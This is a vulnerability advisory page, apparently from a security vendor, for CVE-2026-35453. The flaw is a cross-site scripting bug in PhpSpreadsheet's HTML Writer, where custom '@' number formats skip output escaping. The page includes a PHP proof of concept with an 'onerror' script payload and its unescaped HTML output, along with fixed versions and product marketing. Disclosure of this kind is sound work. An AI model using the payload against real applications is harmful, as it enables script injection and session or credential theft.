Summary
The HTML Writer in PhpSpreadsheet bypasses htmlspecialchars() output escaping when a cell uses a custom number format containing the @ text placeholder with additional literal text (e.g., @ "items" or "Total: "@). This allows an attacker to inject arbitrary HTML and JavaScript into the generated HTML output by crafting a malicious XLSX file.
Details
1. Conditional escaping in Html.php:1586-1594
$cellData = NumberFormat::toFormattedString(
$origData2,
$formatCode ?? NumberFormat::FORMAT_GENERAL,
[$this, 'formatColor']
);
if ($cellData === $origData) {
$cellData = htmlspecialchars($cellData, Settings::htmlEntityFlags());
}
htmlspecialchars() is only called when $cellData === $origData (strict comparison). If the formatted output differs from the original value in any way, escaping is skipped entirely.
2. Early return in Formatter.php:136-152
if (preg_match(self::SECTION_SPLIT, $format) === 0
&& preg_match(self::SYMBOL_AT, $formatx) === 1) {
if (!str_contains($format, '"')) {
return str_replace('@', /* raw value */, $format);
}
return str_replace(/* ... preg_replace with raw value ... */);
}
When the format code contains @ with additional literal text (e.g., @ "items"), the formatter substitutes the raw cell value into the format string and returns early, the formatColor callback (which would have applied htmlspecialchars) is never invoked.
PoC
test.php
<?php
require '/app/vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Writer\Html;
$spreadsheet = new Spreadsheet();
$sheet = $spreadsheet->getActiveSheet();
$payload = '<img src=x onerror=alert(document.domain)>';
$formatCode = '@ "items"';
$sheet->setCellValue('A1', $payload);
$sheet->getStyle('A1')->getNumberFormat()->setFormatCode($formatCode);
$writer = new Html($spreadsheet);
$html = $writer->generateHTMLAll();
file_put_contents('/app/output.html', $html);
echo "HTML output saved to /app/output.html\n";
The produced output contains unescaped data.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="generator" content="PhpSpreadsheet, https://github.com/PHPOffice/PhpSpreadsheet" />
<title>Untitled Spreadsheet</title>
<meta name="author" content="Unknown Creator" />
<meta name="title" content="Untitled Spreadsheet" />
<meta name="lastModifiedBy" content="Unknown Creator" />
<meta name="created" content="2026-04-02T16:34:44+00:00" />
<meta name="modified" content="2026-04-02T16:34:44+00:00" />
<style type="text/css">
[..SNIP..]
</style>
</head>
<body>
<div style='page: page0'>
<table border='0' cellpadding='0' cellspacing='0' id='sheet0' class='sheet0 gridlines'>
<col class="col0" />
<tbody>
<tr class="row0">
<td class="column0 style1 s"><img src=x onerror=alert(document.domain)> items</td>
</tr>
</tbody></table>
</div>
</body>
</html>
Impact
The impact changes based on the way the HTML is served.
In case it is served from the web server it is typical XSS, in case the file is downloaded and opened locally, the attack vector is more limited.
Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
phpoffice/phpspreadsheet to 5.7.0 or later; phpoffice/phpspreadsheet to 3.10.5 or later; phpoffice/phpspreadsheet to 2.4.5 or later; phpoffice/phpspreadsheet to 2.1.16 or later; phpoffice/phpspreadsheet to 1.30.4 or later
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-35453? CVE-2026-35453 is a medium-severity cross-site scripting (XSS) vulnerability in phpoffice/phpspreadsheet (composer), affecting versions >= 4.0.0, <= 5.6.0. It is fixed in 5.7.0, 3.10.5, 2.4.5, 2.1.16, 1.30.4. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
- Which versions of phpoffice/phpspreadsheet are affected by CVE-2026-35453? phpoffice/phpspreadsheet (composer) versions >= 4.0.0, <= 5.6.0 is affected.
- Is there a fix for CVE-2026-35453? Yes. CVE-2026-35453 is fixed in 5.7.0, 3.10.5, 2.4.5, 2.1.16, 1.30.4. Upgrade to this version or later.
- Is CVE-2026-35453 exploitable, and should I be worried? Whether CVE-2026-35453 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-35453 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-35453?
- Upgrade
phpoffice/phpspreadsheetto 5.7.0 or later - Upgrade
phpoffice/phpspreadsheetto 3.10.5 or later - Upgrade
phpoffice/phpspreadsheetto 2.4.5 or later - Upgrade
phpoffice/phpspreadsheetto 2.1.16 or later - Upgrade
phpoffice/phpspreadsheetto 1.30.4 or later
- Upgrade